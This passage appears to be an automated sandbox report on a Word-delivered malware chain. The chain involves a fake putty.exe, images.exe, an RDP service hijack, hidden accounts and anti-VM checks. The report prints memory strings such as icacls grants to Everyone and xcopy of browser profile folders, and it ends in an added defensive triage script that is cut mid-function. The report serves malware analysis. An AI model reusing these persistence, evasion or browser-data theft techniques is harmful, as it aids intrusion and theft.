        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 13_2_0040290E URLDownloadToFileW,ShellExecuteW,
        Source: C:\Users\user\AppData\Roaming\putty.exe File created: C:\ProgramData\images.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\ProgramData\images.exe File created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
        Source: C:\ProgramData\images.exe File created: C:\Program Files\Microsoft DN1\sqlmap.dll
        Source: C:\ProgramData\images.exe File created: C:\Windows\System32\rfxvmt.dll
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe
        Source: C:\ProgramData\images.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 13_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 13_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 13_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 15_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 15_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 15_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,

        Boot Survival:

        Creates an undocumented autostart registry key
        Source: C:\Windows\SysWOW64\reg.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Load
        Source: C:\ProgramData\images.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 13_2_0040D3A8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

        Hooking and other Techniques for Hiding and Protection:

        Contains functionality to hide user accounts
        Source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
        Source: putty.exe String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Source: images.exe String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Hides that the sample has been downloaded from the Internet (zone.identifier)
        Source: C:\Users\user\AppData\Roaming\putty.exe File opened: C:\ProgramData\images.exe:Zone.Identifier read attributes | delete
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe File opened: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe:Zone.Identifier read attributes | delete
        Hides user accounts
        Source: C:\ProgramData\images.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList eC.vaAf
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exe    Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exe    Process information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exe    Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\verclsid.exe    Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\verclsid.exe    Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe    Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exe    Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        Yara detected AntiVM3
        Source: Yara match    File source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match    File source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match    File source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, type: MEMORY
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: putty.exe, 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp    Binary or memory string: WINE_GET_UNIX_FILE_NAME
        Source: putty.exe, 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp    Binary or memory string: SBIEDLL.DLL
        Source: C:\Users\user\AppData\Roaming\putty.exe    Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\putty.exe    Thread delayed: delay time: 922337203685477
        Source: C:\ProgramData\images.exe    Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe    Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\cmd.exe    Window / User API: threadDelayed 709
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe    Window / User API: threadDelayed 8061
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe    Window / User API: threadDelayed 1448
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe    Window / User API: foregroundWindowGot 420
        Source: C:\ProgramData\images.exe    Dropped PE file which has not been started: C:\Program Files\Microsoft DN1\sqlmap.dll
        Source: C:\ProgramData\images.exe    Dropped PE file which has not been started: C:\Windows\System32\rfxvmt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2412    Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3064    Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2684    Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2568    Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3016    Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2704    Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\putty.exe TID: 2972    Thread sleep time: -44533s >= -30000s
        Source: C:\Users\user\AppData\Roaming\putty.exe TID: 1520    Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\putty.exe TID: 2984    Thread sleep time: -42305s >= -30000s
        Source: C:\Users\user\AppData\Roaming\putty.exe TID: 1244    Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\putty.exe TID: 2300    Thread sleep count: 70 > 30
        Source: C:\ProgramData\images.exe TID: 152    Thread sleep time: -46429s >= -30000s
        Source: C:\ProgramData\images.exe TID: 2620    Thread sleep time: -922337203685477s >= -30000s
        Source: C:\ProgramData\images.exe TID: 1192    Thread sleep count: 70 > 30
        Source: C:\ProgramData\images.exe TID: 2440    Thread sleep time: -420000s >= -30000s
        Source: C:\Windows\SysWOW64\cmd.exe TID: 2752    Thread sleep count: 709 > 30
        Source: C:\Windows\SysWOW64\cmd.exe TID: 2752    Thread sleep time: -8508000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe TID: 2248    Thread sleep time: -39409s >= -30000s
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe TID: 1480    Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe TID: 1960Thread sleep time: -11068046444225724s >= -30000s
        Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
        Source: C:\ProgramData\images.exeCode function: 21_3_042397E0 GetSystemTime followed by cmp: cmp edx, 04h and CTI: jc 0423983Bh
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00411446 FindFirstFileW,FindNextFileW,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00411446 FindFirstFileW,FindNextFileW,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,
        Source: C:\ProgramData\images.exeCode function: 21_3_04239970 GetSystemInfo,
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\putty.exeThread delayed: delay time: 44533
        Source: C:\Users\user\AppData\Roaming\putty.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\putty.exeThread delayed: delay time: 42305
        Source: C:\Users\user\AppData\Roaming\putty.exeThread delayed: delay time: 922337203685477
        Source: C:\ProgramData\images.exeThread delayed: delay time: 46429
        Source: C:\ProgramData\images.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeThread delayed: delay time: 39409
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: vmware
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
        Source: powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: VMWARE
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
        Source: C:\ProgramData\images.exeCode function: 21_3_0429723B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00426222 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0041EB27 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00411B38 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00411B3F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00411E6D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00426222 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0041EB27 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00411B38 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00411B3F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00411E6D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00406045 GetProcessHeap,RtlAllocateHeap,
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess token adjusted: Debug
        Source: C:\ProgramData\images.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess token adjusted: Debug
        Source: C:\ProgramData\images.exeCode function: 21_3_0429723B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory allocated: page read and write | page guard
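        The "Thread sleep time" and "Thread delayed" rows above are the sandbox's sleep-evasion heuristic. Two things are worth knowing when reading them: the figures are milliseconds despite the "s" suffix (cmd.exe's 709 sleeps sum to 8508000, i.e. 12000 ms each), and 922337203685477 is exactly TimeSpan.MaxValue expressed in milliseconds (Int64.MaxValue ticks / 10000), which is what a .NET thread parked with Thread.Sleep(TimeSpan.MaxValue) looks like, not a timed delay. The script below is an added example, not part of the report: it replays the heuristic over rows constructed from the ones above (values copied, layout reproduced in both the fused and the separated form) and tells a parked thread apart from a long finite sleep and from a sleep loop. The thresholds are the ones the report prints; the per-process verdict is mine.

```python
"""Triage Joe Sandbox style 'Thread sleep' rows for sleep-based evasion.

Added example, not part of the sandbox report. SAMPLE_ROWS are constructed
from rows in the report above; thresholds mirror the ones the report prints.
"""
import re
from collections import defaultdict

# TimeSpan.MaxValue in milliseconds: Int64.MaxValue ticks / 10,000 ticks per ms.
# A Thread.Sleep(TimeSpan.MaxValue)-style park is logged as exactly this figure.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000   # 922337203685477
LONG_SLEEP_MS = 30_000                    # report threshold, shown as ">= -30000s"
SLEEP_COUNT_LIMIT = 30                    # report threshold, shown as "> 30"

# Rows arrive either fused ("...exe TID: 2412Thread sleep ...") or with " | ".
ROW_RE = re.compile(
    r"^Source:\s+(?P<proc>.+?\.exe)(?:\s+TID:\s+(?P<tid>\d+))?\s*\|?\s*"
    r"Thread sleep (?P<kind>time|count):\s+-?(?P<value>\d+)"
)

# Constructed from the report rows above (values copied, not invented).
SAMPLE_ROWS = [
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2412Thread sleep time: -60000s >= -30000s",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3064Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Users\user\AppData\Roaming\putty.exe TID: 2300 | Thread sleep count: 70 > 30",
    r"Source: C:\ProgramData\images.exe TID: 152Thread sleep time: -46429s >= -30000s",
    r"Source: C:\ProgramData\images.exe TID: 2440Thread sleep time: -420000s >= -30000s",
    r"Source: C:\Windows\SysWOW64\cmd.exe TID: 2752Thread sleep count: 709 > 30",
    r"Source: C:\Windows\SysWOW64\cmd.exe TID: 2752Thread sleep time: -8508000s >= -30000s",
    r"Source: C:\Windows\SysWOW64\cmd.exe | Last function: Thread delayed",  # not a sleep row
]


def classify_delay(ms: int) -> str:
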